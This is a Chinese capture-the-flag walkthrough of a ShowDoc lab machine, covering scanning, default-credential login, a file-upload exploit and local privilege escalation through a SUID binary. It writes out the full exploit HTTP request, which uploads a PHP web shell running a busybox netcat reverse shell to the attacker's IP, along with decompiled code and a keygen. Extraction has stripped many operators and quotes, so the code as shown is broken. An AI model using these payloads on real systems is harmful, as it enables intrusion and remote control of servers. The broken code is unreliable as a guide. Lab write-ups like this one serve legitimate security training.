show-靶机

📅 2026/7/2 3:28:32
show-靶机
扫描┌──(root㉿kali)-[/home/kali1] └─# nmap -A 172.26.17.179 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-26 14:39 CST Nmap scan report for 172.26.17.179 Host is up (0.0032s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 10.0p2 Debian 7deb13u1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.66 ((Debian)) | http-robots.txt: 1 disallowed entry |_/ | http-title: ShowDoc |_Requested resource was ./web/#/ |_http-server-header: Apache/2.4.66 (Debian) 514/tcp filtered shell Device type: WAP Running: Actiontec embedded, Linux OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel OS details: Actiontec MI424WR-GEN3I WAP Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 0.04 ms 192.168.245.2 2 0.04 ms 172.26.17.179 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.28 seconds结合一下信息有一个80端口然后网站的标签是showdocshowdoc是一个类似于腾讯文档的多人协同工作的一个API文档工具旨在帮助开发者编写和管理接口文档。他特别适用于前后端分离的项目能够提供美观且详细的接口方便前端开发人员使用。进来访问会有一个默认页面然后需要登录访问这个靶机的账号和密码其实开始的话我也没有啥思路然后最简单的就是上网看看这种网站有没有默认的账号密码ShowDoc 部署教程账号showdoc密码123456上来之后其实也没有什么好看的说实话。额在这里其实你基本上找不到什么漏洞硬要说的话可以先尝试dirsearch扫描┌──(root㉿kali)-[/home/kali1] └─# dirsearch -u http://172.26.17.179 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/kali1/reports/http_172.26.17.179/_26-06-26_14-57-19.txt Target: http://172.26.17.179/ [14:57:19] Starting: [14:57:20] 403 - 318B - /.ht_wsr.txt [14:57:20] 403 - 318B - /.htaccess.bak1 [14:57:20] 403 - 318B - /.htaccess.orig [14:57:20] 403 - 318B - /.htaccess.save [14:57:20] 403 - 318B - /.htaccess.sample [14:57:20] 403 - 318B - /.htaccess_extra [14:57:20] 403 - 318B - /.htaccess_sc [14:57:20] 403 - 318B - /.htaccess_orig [14:57:20] 403 - 318B - /.htaccessBAK [14:57:20] 403 - 318B - /.htaccessOLD [14:57:20] 403 - 318B - /.htaccessOLD2 [14:57:20] 403 - 318B - /.htm [14:57:20] 403 - 318B - /.html [14:57:20] 403 - 318B - /.htpasswd_test [14:57:20] 403 - 318B - /.htpasswds [14:57:20] 403 - 318B - /.httr-oauth [14:57:20] 403 - 318B - /.php [14:57:25] 404 - 16B - /composer.phar [14:57:25] 200 - 564B - /composer.json [14:57:26] 301 - 362B - /documentation - http://172.26.17.179/documentation/ [14:57:26] 200 - 486B - /documentation/ [14:57:26] 200 - 385B - /Dockerfile [14:57:27] 200 - 4KB - /favicon.ico [14:57:28] 301 - 356B - /install - http://172.26.17.179/install/ [14:57:28] 200 - 696B - /install/ [14:57:28] 200 - 696B - /install/index.php?upgrade/ [14:57:29] 200 - 1KB - /LICENSE.txt [14:57:31] 404 - 16B - /php-cs-fixer.phar [14:57:31] 404 - 16B - /phpunit.phar [14:57:32] 200 - 694B - /Public/ [14:57:32] 200 - 4KB - /README.md [14:57:32] 200 - 30B - /robots.txt [14:57:33] 301 - 355B - /server - http://172.26.17.179/server/ [14:57:33] 403 - 318B - /server-status [14:57:33] 403 - 318B - /server-status/ [14:57:36] 200 - 958B - /web/ Task Completed然后这里有一个compser.json文件这里面有关于showdoc的版本信息v2.8.5之后你就可以根据这个版本去网上找poc漏洞尝试了或者说因为showdoc是开源的你可以去下一下他的源代码来看看。漏洞利用https://github.com/vulhub/vulhub/tree/master/showdoc/CNVD-2020-26585POST /index.php?s/home/page/uploadImg HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate, br Accept: */* Accept-Language: en-US;q0.9,en;q0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 Connection: close Cache-Control: max-age0 Content-Type: multipart/form-data; boundary----WebKitFormBoundary0RdOKBR8AmAxfRyl Content-Length: 213 ------WebKitFormBoundary0RdOKBR8AmAxfRyl Content-Disposition: form-data; nameeditormd-image-file; filenametest.php Content-Type: text/plain ?phpinfo();? ------WebKitFormBoundary0RdOKBR8AmAxfRyl--意思的话大概就是有一个文件上传漏洞然后这个上传漏洞的话在这里好像是关于图片上传的。主要是因为一系列的路由过滤问题。PoC中的/home/page/uploadImg这个路由接口在web前端是找不到点击接口的基本上算是审计代码得到的结果。然后之后我就在想这个漏洞是咋被发现的说实话我在前端页面是真没看到有那个可以点击进去然后我就去查他的源代码源代码搜索结果在web_src源代码可以看到前端代码是否有/home/page/uploadsImg点击接口┌──(root㉿kali)-[/home/kali1/showdoc-2.8.6] └─# grep -rni /api/page/uploadImg .|grep -v html ./web_src/src/components/common/Editormd.vue:105: imageUploadURL: DocConfig.server /api/page/uploadImg, ./web_src/src/components/page/edit/Index.vue:501: var url DocConfig.server /api/page/uploadImg ┌──(root㉿kali)-[/home/kali1/showdoc-2.8.6] └─# grep -rni /home/page/uploadImg .|grep -v html可以看到他的前端源代码里面是真没有这/home/page/uploadImg这个接口emm不过也可能是我看不到那里漏了。POST /index.php?s/home/page/uploadImg HTTP/1.1 Host: 172.26.17.179 Accept: */* Origin: http://172.26.17.179 Cookie: PHPSESSIDplv0o3ku3kvfm94b8m4gs4tv2m; think_languagezh-CN; cookie_token68126cabb2bc16a5875aaf343f3adc83d7a84182809b7642f155010b427c63ef Referer: http://172.26.17.179/web/ Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary----WebKitFormBoundaryABxK2F35Zt6rFPdp Accept-Language: zh-CN,zh;q0.9 Content-Length: 190 ------WebKitFormBoundaryABxK2F35Zt6rFPdp Content-Disposition: form-data; nameeditormd-image-file; filenamed.php Content-Type: text/plain ?php system(busybox nc 172.26.17.163 1234 -e /bin/bash); ? ------WebKitFormBoundaryABxK2F35Zt6rFPdp--HTTP/1.1 200 OK Date: Thu, 25 Jun 2026 04:30:25 GMT Server: Apache/2.4.66 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charsetutf-8 Content-Length: 92 {url:http:\/\/172.26.17.179\/Public\/Uploads\/2026-06-25\/6a3caee154dbc.php,success:1}上来之后找信息其实也没啥技巧 emm密码就藏在php代码里面这里密码在./html/server/Application/Common/Conf/config.php密码为showdoc123456两个用户一个是mooi、l1qin9两个用户密码都一样但是线索在后者l1qin9Show:~$ ls -al total 60 drwx------ 3 l1qin9 l1qin9 4096 Jun 26 03:25 . drwxr-xr-x 4 root root 4096 Apr 25 20:07 .. -rwsr-sr-x 1 root root 16632 Apr 25 22:43 auth_monitor l1qin9Show:~$ ./auth_monitor --- MAZE-SEC ACCESS MONITOR --- SYSTEM_TICK: 1782458733 CHALLENGE_STAMP: f9fb2198 ENTER ACCESS CODE:目录下有一个auth_monitor文件执行一下会出现信息这里丢到ida中分析IDA逆向主函数逆向int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ebx time_t v4; // rax char s[256]; // [rsp10h] [rbp-130h] BYREF int v7; // [rsp110h] [rbp-30h] BYREF unsigned int buf; // [rsp114h] [rbp-2Ch] BYREF FILE *stream; // [rsp118h] [rbp-28h] int v10; // [rsp120h] [rbp-20h] int fd; // [rsp124h] [rbp-1Ch] int i; // [rsp128h] [rbp-18h] unsigned int v13; // [rsp12Ch] [rbp-14h] fd open(/dev/urandom, 0, envp); //从/dev/urandom随机数源获取随机数 if ( fd 0 ) { v3 time(0LL); buf v3 ^ getpid(); } else { read(fd, buf, 4uLL); close(fd); } v13 0; for ( i 0; i 99; i ) //通过原始种子buf进行异或100次之后得到原始种子 { v13 buf % (i 1); v13 ^ **argv; } s0rand(v13); //设置随机数种子srand种子用户设置随机数生成器种子以确保每次运行程序时生成不通的随机数。依赖于一个初始种子。 v10 rand(); puts(--- MAZE-SEC ACCESS MONITOR ---); v4 time(0LL); printf(SYSTEM_TICK: %ld\n, v4); printf(CHALLENGE_STAMP: %08x\n, buf); //这里打印了原始随机数buf所以我们只需要有这个之后写一个完全一样的加密过程就能得到这道题想要的access code printf(ENTER ACCESS CODE: ); if ( (unsigned int)__isoc99_scanf(%d, v7) ! 1 ) return 1; if ( v10 v7 ) { setuid(0); setgid(0); stream fopen(/root/show.txt, r); if ( stream ) { while ( fgets(s, 256, stream) ) printf(%s, s); fclose(stream); } } else { puts(ACCESS DENIED.); } return 0; }然后这个靶机最阴的来了如果你只是看到了前面的初始种子加密过程你只猜对了一半你得金s0rand函数里看.......void s0rand() { srand(0x539u); }就是这个函数并没有将v13作为所谓的初始种子。他重新设置了一个数为0x539u这里转换成十进制就是1337u后面的表示的是数据类型unsigned那么我们在写答案代码的时候就是int main() { unsigned int buf 1337; int answer 0; srand(buf); answer rand(); printf(%d\n, answer); printf(%08x\n, answer); return 0; }最最后将结果提交即可得到答案